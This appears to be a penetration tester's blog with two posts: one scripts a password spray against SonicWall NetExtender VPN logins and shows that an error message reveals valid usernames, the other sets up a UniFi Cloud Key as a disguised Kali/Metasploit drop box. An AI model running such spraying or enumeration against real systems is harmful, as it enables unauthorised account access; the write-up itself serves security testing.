Fun with SonicWall NetExtender

I little while ago I got to play around with a SonicWall firewall that had NetExtender configured. NetExtender is SonicWall’s SSL VPN offering. While my initial goal was just to password spray it, I found a few interesting quirks with the NetExtender client along the way.

Since I had some past experience with SonicWall and NetExtender, I knew there was a Linux CLI client, which led me to believe it would be relatively easy to script a login with it. I downloaded the latest Linux NetExtender client, which can be found with a quick Google search, and installed it. An example of a login attempt using the bare minimum amount of info looks something like this:

 netExtender -u user -p password -d LocalDomain 192.168.1.1:4433
 NetExtender for Linux - Version 9.0.803
 SonicWall
 Copyright (c) 2018 SonicWall
 Connecting to 192.168.1.1:4433…
 There is a problem with the site's security certificate. 
 Warning: self signed certificate
 Do you want to proceed? (Y:Yes, N:No, V:View Certificate)
 Connected.
 Logging in…
 Authentication failure: Login failed - Incorrect username/password.
 SSL VPN logging out…
 Logout command failed
 SSL VPN connection is terminated.
 Exiting NetExtender client

A couple notes about the options and outputs I want to clear up first. The “Login failed” message is pretty self explanatory. The “-u” and “-p” flags should be pretty obvious. The “-d” flag is the login domain, which may be an Active Directory/LDAP back end or the local authentication service (this value is CaSe SeNsItIvE). The default local authentication domain is “LocalDomain”. The warning about a self signed certificate has to be answered, even if you import the cert on the machine. I imagine this wouldn’t be an issue if a valid cert was used. While I was a little disappointed I didn’t immediately get a successful login with user:password, I at least felt that I could script this and spray it regardless. After some trial and error, I came up with this ugly thing:

for j in `cat passwords.txt`; do for i in `cat ../users.txt`; do echo -e "\n\n ***login attempt: $i : $j ***"; echo -e "Y\n" | netExtender -u $i -p $j -d LocalDomain 192.168.1.1:4433; sleep 1; done; done

While it may be ugly and slow, it does the job. It will iterate through the list of users and attempt to log into each user with all the passwords in the list provided. I had a couple delays that would ruin the timing for input, so I added a “sleep 1” in there to help with that and may require a bit bigger of a value depending on connection speeds/reliability. Additionally, it will echo out the username and password attempted, since that isn’t echoed back in the login process itself. If I had a successful attempt, a VPN connection would succeed and just hang there, which I would hopefully catch.

After a few rounds with various user lists, I noticed the following interesting login message:

***login attempt for: user3 : password ***
 NetExtender for Linux - Version 9.0.803
 SonicWall
 Copyright (c) 2018 SonicWall
 Connecting to 192.168.1.1:4433…
 There is a problem with the site's security certificate. 
 Warning: self signed certificate
 Do you want to proceed? (Y:Yes, N:No, V:View Certificate)
 Connected.
 Logging in…
 Authentication failure: User doesn't belong to SSLVPN service group
 SSL VPN logging out…
 Logout command failed
 SSL VPN connection is terminated.
 Exiting NetExtender client

Well, it looks like we have a valid user! It won’t do us much good here since it doesn’t have permission to log in via NetExtender. I initially thought maybe the password was valid, but after a little playing around found out that the same message was returned regardless of the password value. A nice little user-enumeration.

While this may not immediately be valuable since you can’t directly use any of the enumerated users to log into NetExtender, you can always use them for other services or validate the username format. Also, while I didn’t/couldn’t test this with an Active Directory/LDAP back end, it may prove to be a handy way to enum/spray AD from an external perspective.

Edited 2021-01-14

Unifi Kali Key?

I have used UniFi/Ubiquiti network products for quiet some time now. I’ve deployed their hardware at many past customers and used it for most of my home network. Recently, I had to manually update the firmware on my Cloud Key via a shell and did some poking around on it. It seems to just be an ARM device with Debian and some software installed. Since it accepts POE for power and looks pretty innocuous in a network rack, I thought it would be an interesting device to get some of the Kali tool-set to run on.

To start off, here is a link to the official product page. This device is a purpose built “server”, which runs Ubiquiti’s UniFi controller software, is powered over POE, has an SD card slot, and has a simple web interface for managing the device itself. Ubiquiti offers a “cloud” management system as well, allowing network management over the Internet, hence the name Cloud Key. As for hardware specs, it has 2Gb of RAM, 16Gb onboard MMC storage, and a quad-core ARM CPU. There has been some hardware revisions, it seems, and I believe what I have here is a third generation, which includes USB C for external power and a physical power button.

After powering it up and getting SSHed in, I started snooping around the Debian install.

root@UniFi-CloudKey:~# uname -a
Linux UniFi-CloudKey 3.10.20-ubnt-mtk #2 SMP PREEMPT Mon Jan 8 12:40:11 PST 2018 armv7l GNU/Linux
root@UniFi-CloudKey:~# lspci
pcilib: Cannot open /proc/bus/pci
lspci: Cannot find any working access method.
root@UniFi-CloudKey:~# lscpu
Architecture:          armv7l
Byte Order:            Little Endian
CPU(s):                4
On-line CPU(s) list:   0-3
Thread(s) per core:    1
Core(s) per socket:    4
Socket(s):             1
CPU max MHz:           1300.0000
CPU min MHz:           598.0000
root@UniFi-CloudKey:~# lsblk
NAME         MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
mmcblk0rpmb  179:96   0    4M  0 disk
mmcblk0boot0 179:32   0    4M  1 disk
mmcblk0boot1 179:64   0    4M  1 disk
mmcblk0      179:0    0 14.7G  0 disk
|-mmcblk0p1  179:1    0  512K  0 part
|-mmcblk0p2  179:2    0  256K  0 part
|-mmcblk0p3  179:3    0  256K  0 part
|-mmcblk0p4  179:4    0   32M  0 part
|-mmcblk0p5  179:5    0   32M  0 part
|-mmcblk0p6  179:6    0    1G  0 part /mnt/.rofs
|-mmcblk0p7  179:7    0    3G  0 part /mnt/.rwfs
`-mmcblk0p8  179:8    0 10.6G  0 part /srv
mmcblk1      179:128  0  7.4G  0 disk
`-mmcblk1p1  179:129  0  7.4G  0 part /data
mtdblock0     31:0    0   64K  1 disk
mtdblock1     31:1    0  960K  0 disk
root@UniFi-CloudKey:~# free -m
             total       used       free     shared    buffers     cached
Mem:          2017        715       1302          5        124        420
-/+ buffers/cache:        170       1847
Swap:            0          0          0
root@UniFi-CloudKey:~# df -h
Filesystem                     Size  Used Avail Use% Mounted on
aufs-root                      2.9G  354M  2.6G  13% /
udev                            10M     0   10M   0% /dev
tmpfs                          404M  396K  404M   1% /run
/dev/disk/by-label/userdata    2.9G  354M  2.6G  13% /mnt/.rwfs
/dev/disk/by-partlabel/rootfs  291M  291M     0 100% /mnt/.rofs
tmpfs                         1009M     0 1009M   0% /dev/shm
tmpfs                          5.0M     0  5.0M   0% /run/lock
tmpfs                         1009M     0 1009M   0% /sys/fs/cgroup
tmpfs                         1009M     0 1009M   0% /tmp
/dev/mmcblk0p8                  11G  137M   11G   2% /srv
/dev/mmcblk1p1                 7.2G   17M  7.2G   1% /data
root@UniFi-CloudKey:~# apt list --installed
Listing... Done
acl/oldstable,now 2.2.52-2 armhf [installed]
adduser/oldstable,now 3.113+nmu3 all [installed]
apt/oldstable,oldstable,now 1.0.9.8.4 armhf [installed]
apt-transport-https/oldstable,oldstable,now 1.0.9.8.4 armhf [installed]
apt-utils/oldstable,oldstable,now 1.0.9.8.4 armhf [installed]
aufs-tools/oldstable,now 1:3.2+20130722-1.1 armhf [installed]
base-files/now 8+deb8u10 armhf [installed,upgradable to: 8+deb8u11]
base-passwd/oldstable,now 3.5.37 armhf [installed]
bash/oldstable,now 4.3-11+deb8u1 armhf [installed]
binutils/oldstable,now 2.25-5+deb8u1 armhf [installed]
bluez/oldstable,oldstable,now 5.23-2+deb8u1 armhf [installed]
bsdutils/oldstable,now 1:2.25.2-6 armhf [installed]
busybox/oldstable,now 1:1.22.0-9+deb8u4 armhf [installed]
busybox-syslogd/oldstable,now 1:1.22.0-9+deb8u4 all [installed]
ca-certificates/oldstable,now 20141019+deb8u4 all [installed]
cloudkey-webui/now 2.0.10-1 all [installed,local]
coreutils/oldstable,now 8.23-4 armhf [installed]
cpio/oldstable,oldstable,now 2.11+dfsg-4.1+deb8u1 armhf [installed]
cpufrequtils/oldstable,now 008-1 armhf [installed]
cron/oldstable,now 3.0pl1-127+deb8u1 armhf [installed]
cron-apt/oldstable,now 0.9.2 all [installed]
curl/oldstable,oldstable,now 7.38.0-4+deb8u11 armhf [installed]
dash/oldstable,now 0.5.7-4+b1 armhf [installed]
dbus/oldstable,now 1.8.22-0+deb8u1 armhf [installed]
debconf/oldstable,now 1.5.56+deb8u1 all [installed]
debconf-i18n/oldstable,now 1.5.56+deb8u1 all [installed]
debian-archive-keyring/oldstable,now 2017.5~deb8u1 all [installed]
debianutils/oldstable,now 4.4+b1 armhf [installed]
dialog/oldstable,now 1.2-20140911-1 armhf [installed]
diffutils/oldstable,now 1:3.3-1+b1 armhf [installed]
dmeventd/oldstable,now 2:1.02.90-2.2+deb8u1 armhf [installed]
dmsetup/oldstable,now 2:1.02.90-2.2+deb8u1 armhf [installed]
dpkg/oldstable,now 1.17.27 armhf [installed]
e2fslibs/oldstable,now 1.42.12-2+b1 armhf [installed]
e2fsprogs/oldstable,now 1.42.12-2+b1 armhf [installed]
ethtool/oldstable,now 1:3.16-1 armhf [installed]
findutils/oldstable,now 4.4.2-9+b1 armhf [installed]
firmware-atheros/oldstable,now 0.43 all [installed]
freeradius/oldstable,oldstable,now 2.2.5+dfsg-0.2+deb8u1 armhf [installed]
freeradius-common/oldstable,oldstable,now 2.2.5+dfsg-0.2+deb8u1 all [installed]
freeradius-ldap/oldstable,oldstable,now 2.2.5+dfsg-0.2+deb8u1 armhf [installed]
freeradius-utils/oldstable,oldstable,now 2.2.5+dfsg-0.2+deb8u1 armhf [installed]
gcc-4.8-base/oldstable,now 4.8.4-1 armhf [installed]
gcc-4.9-base/oldstable,oldstable,now 4.9.2-10+deb8u1 armhf [installed]
gnupg/oldstable,oldstable,now 1.4.18-7+deb8u5 armhf [installed]
gpgv/oldstable,oldstable,now 1.4.18-7+deb8u5 armhf [installed]
grep/oldstable,now 2.20-4.1 armhf [installed]
gzip/oldstable,now 1.6-4 armhf [installed]
hostname/oldstable,now 3.15 armhf [installed]
htop/oldstable,now 1.0.3-1 armhf [installed]
init/oldstable,now 1.22 armhf [installed]
init-system-helpers/oldstable,now 1.22 all [installed]
initramfs-tools/oldstable,now 0.120+deb8u3 all [installed]
initscripts/oldstable,now 2.88dsf-59 armhf [installed]
insserv/oldstable,now 1.14.0-5 armhf [installed]
iperf/oldstable,now 2.0.5+dfsg1-2 armhf [installed]
iproute/oldstable,now 1:3.16.0-2 all [installed]
iproute2/oldstable,now 3.16.0-2 armhf [installed]
iptables/oldstable,now 1.4.21-2+b1 armhf [installed]
iputils-ping/oldstable,now 3:20121221-5+b2 armhf [installed]
jsvc/oldstable,now 1.0.15-6+deb8u1 armhf [installed]
klibc-utils/oldstable,now 2.0.4-2 armhf [installed]
kmod/oldstable,now 18-3 armhf [installed]
less/oldstable,now 458-3 armhf [installed]
libacl1/oldstable,now 2.2.52-2 armhf [installed]
libapparmor1/oldstable,now 2.9.0-3 armhf [installed]
libapt-inst1.5/oldstable,oldstable,now 1.0.9.8.4 armhf [installed]
libapt-pkg4.12/oldstable,oldstable,now 1.0.9.8.4 armhf [installed]
libasound2/oldstable,now 1.0.28-1 armhf [installed]
libasound2-data/oldstable,now 1.0.28-1 all [installed]
libattr1/oldstable,now 1:2.4.47-2 armhf [installed]
libaudit-common/oldstable,now 1:2.4-1 all [installed]
libaudit1/oldstable,now 1:2.4-1+b1 armhf [installed]
libblkid1/oldstable,now 2.25.2-6 armhf [installed]
libboost-filesystem1.55.0/oldstable,now 1.55.0+dfsg-3 armhf [installed]
libboost-program-options1.55.0/oldstable,now 1.55.0+dfsg-3 armhf [installed]
libboost-system1.55.0/oldstable,now 1.55.0+dfsg-3 armhf [installed]
libboost-thread1.55.0/oldstable,now 1.55.0+dfsg-3 armhf [installed]
libbsd0/oldstable,now 0.7.0-2 armhf [installed]
libbz2-1.0/oldstable,now 1.0.6-7+b3 armhf [installed]
libc-bin/oldstable,oldstable,now 2.19-18+deb8u10 armhf [installed]
libc6/oldstable,oldstable,now 2.19-18+deb8u10 armhf [installed]
libcap-ng0/oldstable,now 0.7.4-2 armhf [installed]
libcap2/oldstable,now 1:2.24-8 armhf [installed]
libcap2-bin/oldstable,now 1:2.24-8 armhf [installed]
libcomerr2/oldstable,now 1.42.12-2+b1 armhf [installed]
libcommons-daemon-java/oldstable,now 1.0.15-6+deb8u1 all [installed]
libcpufreq0/oldstable,now 008-1 armhf [installed]
libcryptsetup4/oldstable,now 2:1.6.6-5 armhf [installed]
libcurl3/oldstable,oldstable,now 7.38.0-4+deb8u11 armhf [installed]
libcurl3-gnutls/oldstable,oldstable,now 7.38.0-4+deb8u11 armhf [installed]
libdb5.3/oldstable,now 5.3.28-9+deb8u1 armhf [installed]
libdbus-1-3/oldstable,now 1.8.22-0+deb8u1 armhf [installed]
libdebconfclient0/oldstable,now 0.192 armhf [installed]
libdevmapper-event1.02.1/oldstable,now 2:1.02.90-2.2+deb8u1 armhf [installed]
libdevmapper1.02.1/oldstable,now 2:1.02.90-2.2+deb8u1 armhf [installed]
libedit2/oldstable,now 3.1-20140620-2 armhf [installed]
libevent-2.0-5/oldstable,oldstable,now 2.0.21-stable-2+deb8u1 armhf [installed]
libexpat1/oldstable,oldstable,now 2.1.0-6+deb8u4 armhf [installed]
libffi6/oldstable,oldstable,now 3.1-2+deb8u1 armhf [installed]
libfreeradius2/oldstable,oldstable,now 2.2.5+dfsg-0.2+deb8u1 armhf [installed]
libgcc1/oldstable,oldstable,now 1:4.9.2-10+deb8u1 armhf [installed]
libgcrypt20/oldstable,now 1.6.3-2+deb8u5 armhf [installed]
libgdbm3/oldstable,now 1.8.3-13.1 armhf [installed]
libglib2.0-0/oldstable,now 2.42.1-1+b1 armhf [installed]
libgmp10/oldstable,now 2:6.0.0+dfsg-6 armhf [installed]
libgnutls-deb0-28/oldstable,now 3.3.8-6+deb8u7 armhf [installed]
libgnutls-openssl27/oldstable,now 3.3.8-6+deb8u7 armhf [installed]
libgpg-error0/oldstable,now 1.17-3 armhf [installed]
libgssapi-krb5-2/oldstable,now 1.12.1+dfsg-19+deb8u4 armhf [installed]
libhogweed2/oldstable,now 2.7.1-5+deb8u2 armhf [installed]
libicu52/oldstable,oldstable,now 52.1-8+deb8u7 armhf [installed]
libidn11/oldstable,now 1.29-1+deb8u3 armhf [installed]
libjson-c2/oldstable,now 0.11-4 armhf [installed]
libk5crypto3/oldstable,now 1.12.1+dfsg-19+deb8u4 armhf [installed]
libkeyutils1/oldstable,now 1.5.9-5+b1 armhf [installed]
libklibc/oldstable,now 2.0.4-2 armhf [installed]
libkmod2/oldstable,now 18-3 armhf [installed]
libkrb5-3/oldstable,now 1.12.1+dfsg-19+deb8u4 armhf [installed]
libkrb5support0/oldstable,now 1.12.1+dfsg-19+deb8u4 armhf [installed]
libldap-2.4-2/oldstable,now 2.4.40+dfsg-1+deb8u3 armhf [installed,upgradable to: 2.4.40+dfsg-1+deb8u4]
liblocale-gettext-perl/oldstable,now 1.05-8+b1 armhf [installed]
liblockfile-bin/oldstable,now 1.09-6 armhf [installed]
libltdl7/oldstable,now 2.4.2-1.11 armhf [installed]
liblvm2cmd2.02/oldstable,now 2.02.111-2.2+deb8u1 armhf [installed]
liblzma5/oldstable,now 5.1.1alpha+20120614-2+b3 armhf [installed]
liblzo2-2/oldstable,now 2.08-1.2 armhf [installed]
libmagic1/now 1:5.22+15-2+deb8u3 armhf [installed,upgradable to: 1:5.22+15-2+deb8u4]
libmount1/oldstable,now 2.25.2-6 armhf [installed]
libncurses5/now 5.9+20140913-1+deb8u2 armhf [installed,upgradable to: 5.9+20140913-1+deb8u3]
libncursesw5/now 5.9+20140913-1+deb8u2 armhf [installed,upgradable to: 5.9+20140913-1+deb8u3]
libnettle4/oldstable,now 2.7.1-5+deb8u2 armhf [installed]
libnfnetlink0/oldstable,now 1.0.1-3 armhf [installed]
libnl-3-200/oldstable,now 3.2.24-2 armhf [installed]
libnl-route-3-200/oldstable,now 3.2.24-2 armhf [installed]
libonig2/oldstable,now 5.9.5-3.2+deb8u1 armhf [installed]
libopts25/oldstable,now 1:5.18.4-3 armhf [installed]
libp11-kit0/oldstable,now 0.20.7-1 armhf [installed]
libpam-modules/oldstable,now 1.1.8-3.1+deb8u2+b1 armhf [installed]
libpam-modules-bin/oldstable,now 1.1.8-3.1+deb8u2+b1 armhf [installed]
libpam-runtime/oldstable,now 1.1.8-3.1+deb8u2 all [installed]
libpam-usermapper/now 0.1 armhf [installed,local]
libpam0g/oldstable,now 1.1.8-3.1+deb8u2+b1 armhf [installed]
libparted2/oldstable,now 3.2-7 armhf [installed]
libpcap0.8/oldstable,now 1.6.2-2 armhf [installed]
libpci3/oldstable,now 1:3.2.1-3 armhf [installed]
libpcre3/oldstable,now 2:8.35-3.3+deb8u4 armhf [installed]
libpcrecpp0/oldstable,now 2:8.35-3.3+deb8u4 armhf [installed]
libperl4-corelibs-perl/oldstable,now 0.003-1 all [installed]
libperl5.20/oldstable,oldstable,now 5.20.2-3+deb8u11 armhf [installed]
libpopt0/oldstable,now 1.16-10 armhf [installed]
libprocps3/oldstable,oldstable,now 2:3.3.9-9+deb8u1 armhf [installed]
libpsl0/oldstable,now 0.5.1-1 armhf [installed]
libpython-stdlib/oldstable,now 2.7.9-1 armhf [installed]
libpython2.7/oldstable,now 2.7.9-2+deb8u1 armhf [installed]
libpython2.7-minimal/oldstable,now 2.7.9-2+deb8u1 armhf [installed]
libpython2.7-stdlib/oldstable,now 2.7.9-2+deb8u1 armhf [installed]
libqdbm14/oldstable,now 1.8.78-5+b1 armhf [installed]
libreadline5/oldstable,now 5.2+dfsg-2 armhf [installed]
libreadline6/oldstable,now 6.3-8+b3 armhf [installed]
librtmp1/oldstable,oldstable,now 2.4+20150115.gita107cef-1+deb8u1 armhf [installed]
libsasl2-2/oldstable,oldstable,now 2.1.26.dfsg1-13+deb8u1 armhf [installed]
libsasl2-modules-db/oldstable,oldstable,now 2.1.26.dfsg1-13+deb8u1 armhf [installed]
libselinux1/oldstable,now 2.3-2 armhf [installed]
libsemanage-common/oldstable,now 2.3-1 all [installed]
libsemanage1/oldstable,now 2.3-1+b1 armhf [installed]
libsepol1/oldstable,now 2.3-2 armhf [installed]
libslang2/oldstable,now 2.3.0-2 armhf [installed]
libsmartcols1/oldstable,now 2.25.2-6 armhf [installed]
libsnappy1/oldstable,now 1.1.2-3 armhf [installed]
libsqlite3-0/oldstable,now 3.8.7.1-1+deb8u2 armhf [installed]
libss2/oldstable,now 1.42.12-2+b1 armhf [installed]
libssh2-1/oldstable,oldstable,now 1.4.3-4.1+deb8u1 armhf [installed]
libssl1.0.0/oldstable,now 1.0.1t-1+deb8u9 armhf [installed]
libstdc++6/oldstable,oldstable,now 4.9.2-10+deb8u1 armhf [installed]
libsystemd0/oldstable,now 215-17+deb8u7 armhf [installed]
libtasn1-6/oldstable,oldstable,now 4.2-3+deb8u3 armhf [installed]
libtext-charwidth-perl/oldstable,now 0.04-7+b4 armhf [installed]
libtext-iconv-perl/oldstable,now 1.7-5+b2 armhf [installed]
libtext-wrapi18n-perl/oldstable,now 0.06-7 all [installed]
libtinfo5/now 5.9+20140913-1+deb8u2 armhf [installed,upgradable to: 5.9+20140913-1+deb8u3]
libudev1/oldstable,now 215-17+deb8u7 armhf [installed]
libusb-0.1-4/oldstable,now 2:0.1.12-25 armhf [installed]
libusb-1.0-0/oldstable,now 2:1.0.19-1 armhf [installed]
libustr-1.0-1/oldstable,now 1.0.4-3+b2 armhf [installed]
libuuid1/oldstable,now 2.25.2-6 armhf [installed]
libv8-3.14.5/oldstable,now 3.14.5.8-8.1 armhf [installed]
libwrap0/oldstable,now 7.6.q-25 armhf [installed]
libx11-6/oldstable,now 2:1.6.2-3+deb8u1 armhf [installed]
libx11-data/oldstable,now 2:1.6.2-3+deb8u1 all [installed]
libxau6/oldstable,now 1:1.0.8-1 armhf [installed]
libxcb1/oldstable,now 1.10-3+b1 armhf [installed]
libxdmcp6/oldstable,now 1:1.1.1-1+b1 armhf [installed]
libxext6/oldstable,now 2:1.3.3-1 armhf [installed]
libxi6/oldstable,now 2:1.7.4-1+deb8u1 armhf [installed]
libxml2/oldstable,oldstable,now 2.9.1+dfsg1-5+deb8u6 armhf [installed]
libxrender1/oldstable,now 1:0.9.8-1+b1 armhf [installed]
libxtables10/oldstable,now 1.4.21-2+b1 armhf [installed]
libxtst6/oldstable,now 2:1.2.2-1+deb8u1 armhf [installed]
linux-image-3.10.20-ubnt-mtk/now 2.1 armhf [installed,local]
login/oldstable,oldstable,now 1:4.2-3+deb8u4 armhf [installed]
logrotate/oldstable,now 3.8.7-1+b1 armhf [installed]
lsb-base/oldstable,now 4.1+Debian13+nmu1 all [installed]
lsb-release/oldstable,now 4.1+Debian13+nmu1 all [installed]
lsof/oldstable,now 4.86+dfsg-1 armhf [installed]
lvm2/oldstable,now 2.02.111-2.2+deb8u1 armhf [installed]
mawk/oldstable,now 1.3.3-17 armhf [installed]
mime-support/oldstable,now 3.58 all [installed]
mongodb-clients/oldstable,now 1:2.4.10-5+deb8u1 armhf [installed]
mongodb-server/oldstable,now 1:2.4.10-5+deb8u1 armhf [installed]
mount/oldstable,now 2.25.2-6 armhf [installed]
mtd-utils/oldstable,now 1:1.5.1-1 armhf [installed]
multiarch-support/oldstable,oldstable,now 2.19-18+deb8u10 armhf [installed]
ncurses-base/now 5.9+20140913-1+deb8u2 all [installed,upgradable to: 5.9+20140913-1+deb8u3]
ncurses-bin/now 5.9+20140913-1+deb8u2 armhf [installed,upgradable to: 5.9+20140913-1+deb8u3]
net-tools/oldstable,now 1.60-26+b1 armhf [installed]
netbase/oldstable,now 5.3 all [installed]
nginx-common/oldstable,oldstable,now 1.6.2-5+deb8u5 all [installed]
nginx-light/oldstable,oldstable,now 1.6.2-5+deb8u5 armhf [installed]
openssh-client/oldstable,now 1:6.7p1-5+deb8u5 armhf [installed]
openssh-server/oldstable,now 1:6.7p1-5+deb8u5 armhf [installed]
openssh-sftp-server/oldstable,now 1:6.7p1-5+deb8u5 armhf [installed]
openssl/oldstable,now 1.0.1t-1+deb8u9 armhf [installed]
oracle-java8-jdk/now 8u151 armhf [installed,local]
parted/oldstable,now 3.2-7 armhf [installed]
passwd/oldstable,oldstable,now 1:4.2-3+deb8u4 armhf [installed]
pciutils/oldstable,now 1:3.2.1-3 armhf [installed]
perl/oldstable,oldstable,now 5.20.2-3+deb8u11 armhf [installed]
perl-base/oldstable,oldstable,now 5.20.2-3+deb8u11 armhf [installed]
perl-modules/oldstable,oldstable,now 5.20.2-3+deb8u11 all [installed]
php5-cli/oldstable,now 5.6.36+dfsg-0+deb8u1 armhf [installed]
php5-common/oldstable,now 5.6.36+dfsg-0+deb8u1 armhf [installed]
php5-fpm/oldstable,now 5.6.36+dfsg-0+deb8u1 armhf [installed]
php5-json/oldstable,now 1.3.6-1 armhf [installed]
procps/oldstable,oldstable,now 2:3.3.9-9+deb8u1 armhf [installed]
psmisc/oldstable,now 22.21-2 armhf [installed]
python/oldstable,now 2.7.9-1 armhf [installed]
python-minimal/oldstable,now 2.7.9-1 armhf [installed]
python2.7/oldstable,now 2.7.9-2+deb8u1 armhf [installed]
python2.7-minimal/oldstable,now 2.7.9-2+deb8u1 armhf [installed]
readline-common/oldstable,now 6.3-8 all [installed]
rfkill/oldstable,now 0.5-1 armhf [installed]
sed/oldstable,now 4.2.2-4+deb8u1 armhf [installed]
sensible-utils/oldstable,oldstable,now 0.0.9+deb8u1 all [installed]
ssl-cert/oldstable,now 1.0.35 all [installed]
startpar/oldstable,now 0.59-3 armhf [installed]
sudo/oldstable,now 1.8.10p3-1+deb8u5 armhf [installed]
systemd/oldstable,now 215-17+deb8u7 armhf [installed]
systemd-networkd-fallbacker/now 0.3 armhf [installed,local]
systemd-sysv/oldstable,now 215-17+deb8u7 armhf [installed]
sysv-rc/oldstable,now 2.88dsf-59 all [installed]
sysvinit-utils/oldstable,now 2.88dsf-59 armhf [installed]
tar/oldstable,oldstable,now 1.27.1-2+deb8u1 armhf [installed]
tcpdump/oldstable,oldstable,now 4.9.2-1~deb8u1 armhf [installed]
tzdata/now 2017c-0+deb8u1 all [installed,upgradable to: 2018e-0+deb8u1]
ubnt-archive-keyring/now 1.0-1 all [installed,local]
ubnt-freeradius-setup/now 0.1 all [installed,local]
ubnt-mtk-initramfs/now 1.1 all [installed,local]
ubnt-tools/now 0.9.7-1 armhf [installed,local]
ubnt-unifi-setup/now 0.2.1 all [installed,local]
ucf/oldstable,now 3.0030 all [installed]
udev/oldstable,now 215-17+deb8u7 armhf [installed]
unifi/now 5.6.29-10253 all [installed,upgradable to: 5.8.28-11052-1]
usbutils/oldstable,now 1:007-2 armhf [installed]
util-linux/oldstable,now 2.25.2-6 armhf [installed]
vim-common/oldstable,now 2:7.4.488-7+deb8u3 armhf [installed]
vim-tiny/oldstable,now 2:7.4.488-7+deb8u3 armhf [installed]
vlan/oldstable,now 1.9-3.2 armhf [installed]
wget/oldstable,oldstable,now 1.16-1+deb8u5 armhf [installed]
x11-common/oldstable,now 1:7.7+7 all [installed]
xz-utils/oldstable,now 5.1.1alpha+20120614-2+b3 armhf [installed]
zlib1g/oldstable,now 1:1.2.8.dfsg-2+b1 armhf [installed]

I eventually found some interesting Ubnt-* tools. These are used to do some firmware and service related tasks. It looks like some features are duplicated in different tools.

root@UniFi-CloudKey:~# ubnt-unifi-setup
Usage: /usr/sbin/ubnt-unifi-setup start|stop
root@UniFi-CloudKey:~# ubnt-systool
Ubiquiti system tools, v1.0
Usage: /sbin/ubnt-systool  []
  supported commands:
     timezone 
     hostname 
     network  
     fwupdate 
     fwupdatestatus
     resetbutton <true|false>
     pwcheck
     chpasswd
     adminname 
     reboot
     poweroff
     reset2defaults
     cleanup
     led          
root@UniFi-CloudKey:~# ubnt-tools
Ubiquiti system tools
Copyright 2006-2015, Ubiquiti Networks, Inc. <support@ubnt.com>

This program is proprietary software; you can not redistribute it and/or modify
it without signed agreement with Ubiquiti Networks, Inc.

	bgnd
	ubnt-discover
	infctld
	pwcheck
	fwupdate
	fwinfo
	fsync
	hwaddr
	sysusermerge

With all that out of the way, I decided to try to just add the Kali repo and install something from it. First I need to install nano, I guess.

I added the Kali repo, added the gpg key for their repo, updated package lists, then tried to install metasploit.

echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
apt-key adv --recv-keys --keyserver keyserver.ubuntu.com 7D8D0BF6
apt update
apt install metasploit-framework

And metasploit works!

With that being a success, there are a few issues that need to be addressed. First, the UniFi controller software is still running, possibly spewing packets to the network, looking for APs and switches. That, along with some other unneeded software, can easily be removed. Two, due to how the onboard MMC storage is partitioned, the root filesystem only has about 1.5G left after the MSF install. I’m sure I can find a way to use other partitions or SD card for storage. I’ll work on that later, since its not breaking anything yet. Three, I need to set up an automatic reverse shell, since the intent is to not be logging into this thing locally. And lastly, some encrypted storage probably wouldn’t be a bad idea as well.

Part two is coming soon…